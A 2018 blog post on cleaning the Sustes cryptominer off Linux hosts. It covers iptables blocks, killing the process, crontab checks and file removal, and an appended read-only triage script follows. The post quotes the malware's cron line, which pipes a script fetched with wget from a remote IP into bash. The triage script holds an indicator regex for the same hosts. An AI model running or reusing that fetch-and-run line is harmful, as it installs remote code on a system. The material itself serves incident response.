Saturday, 27 October 2018

Blocking Sustes Malware/Ransomware with IPTables on Linux

Block the IP with the following commands.

iptables -A INPUT -s 192.99.142.246 -j DROP

iptables -A OUTPUT -s 192.99.142.246 -j DROP

iptables -A OUTPUT -j DROP -d 192.99.142.246

Now save the newly added iptables configuration with the command below.

/sbin/service iptables save

Additionally, if no application on the host depends on them, you can uninstall the packages below.

wget
curl

This is cryptominer malware. You must remove it from your system completely: the process and the files.

First, remove its cron job. The miner can run as any user, including root, so start by finding the process called "sustes".

You can find the username with "top" or in the output of this command:

ps aux | grep sustes

Then kill the sustes process with -9, using the commands below:

ps -ef | grep sustes

kill -9 <PID>
Then look at the cron jobs of this user:

crontab -u username -l

If it contains this line

* * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

then edit this cron job:

crontab -e -u username

or delete all of them with

crontab -r -u username

Then delete these files:

/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123
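As an added example (not from the original post), the checks above gathered into a read-only POSIX shell triage script: it looks for the sustes process, crontab lines matching the indicators quoted above, the dropped files under /var/tmp, and whether the iptables DROP rules for 192.99.142.246 are actually loaded. The function names and the indicator regex are my own assumptions built from the values in the post; the script only reports and leaves removal to the steps above.

```shell
#!/bin/sh
# Added triage script (not from the original post): read-only checks for the
# Sustes indicators listed above. Function names and the indicator regex are
# assumptions built from the values in the post; removal stays manual.
# Run the full report with:  sh sustes_triage.sh --run
C2_IP="192.99.142.246"                     # address dropped by the iptables rules above
CRON_PATTERN='192\.99\.142\.24[68]|mr\.sh|/var/tmp/sustes'   # assumed indicator regex
DROPPED_FILES="/var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123"

# Filter crontab text on stdin to lines matching the indicators (exit 0 if any matched).
sustes_cron_hits() {
    grep -E "$CRON_PATTERN"
}

# Print how many of the known dropped files exist. Optional first argument is a
# root prefix (e.g. a mounted disk image); default is the live filesystem.
sustes_file_count() {
    root="${1:-}"
    n=0
    for f in $DROPPED_FILES; do
        if [ -e "$root$f" ]; then n=$((n + 1)); fi
    done
    echo "$n"
}

# List running processes named sustes (or sustes3); exit 0 if any are found.
sustes_proc_hits() {
    ps -eo pid,user,comm | grep -Ew 'sustes3?'
}

# Confirm both DROP rules for the miner's address are loaded (iptables -C = check).
sustes_block_rules_present() {
    iptables -C INPUT -s "$C2_IP" -j DROP 2>/dev/null &&
        iptables -C OUTPUT -d "$C2_IP" -j DROP 2>/dev/null
}

# Walk every account in /etc/passwd and report matching crontab lines as "user: line".
sustes_scan_crontabs() {
    cut -d: -f1 /etc/passwd | while read -r user; do
        crontab -u "$user" -l 2>/dev/null | sustes_cron_hits | sed "s/^/$user: /"
    done
}

if [ "${1:-}" = "--run" ]; then
    echo "== sustes processes =="; sustes_proc_hits || echo "none"
    echo "== crontab hits ==";     sustes_scan_crontabs
    echo "== dropped files present: $(sustes_file_count) of 4"
    sustes_block_rules_present && echo "== iptables DROP rules loaded" || echo "== iptables DROP rules missing"
fi
```

Running the full report needs root for the crontab and iptables checks; the individual functions can also be sourced and pointed at a mounted image via the root-prefix argument.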